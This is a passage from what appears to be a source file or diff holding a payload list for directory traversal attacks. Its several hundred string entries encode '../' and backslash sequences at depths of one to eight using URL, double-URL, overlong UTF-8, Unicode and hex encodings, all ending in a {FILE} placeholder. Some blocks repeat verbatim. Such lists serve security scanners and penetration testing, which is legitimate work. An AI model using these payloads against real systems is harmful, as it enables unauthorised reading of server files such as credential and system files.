"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + "true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + 